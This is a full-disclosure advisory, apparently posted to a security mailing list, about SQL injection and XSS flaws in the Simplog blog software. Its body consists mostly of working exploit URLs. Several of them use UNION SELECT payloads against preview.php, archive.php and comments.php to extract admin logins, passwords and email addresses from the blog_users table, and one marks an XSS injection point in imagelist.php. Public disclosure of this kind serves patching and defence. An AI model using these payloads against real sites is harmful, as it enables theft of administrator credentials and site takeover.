How&Example:
SQL Injection :
Needs MySQL > 4.0
GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL]
EXAMPLE ->
http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1//UNION//SELECT//
concat(25552,login,25553,password,25554)//from//blog_users//where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1//UNION//SELECT//0,null,0,email,0,0,login,
password,0,admin,0//from//blog_users//where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1//UNION//SELECT//0,null,0,email,0,0,login,
password,0,admin,0//from//blog_users//where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1//UNION//SELECT//0,null,0,email,0,0,login,
password,0,admin,0//from//blog_users//where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1//UNION//SELECT//0,null,0,email,0,0,login,
password,0,admin,0//from//blog_users//where/**/admin=1/*
with this examples remote attacker can leak speficied admins login
information from database.
XSS:
GET ->
http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=[XSS]
Timeline:
Original advisory can be found at: http://www.nukedx.com/?viewdoc=25
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/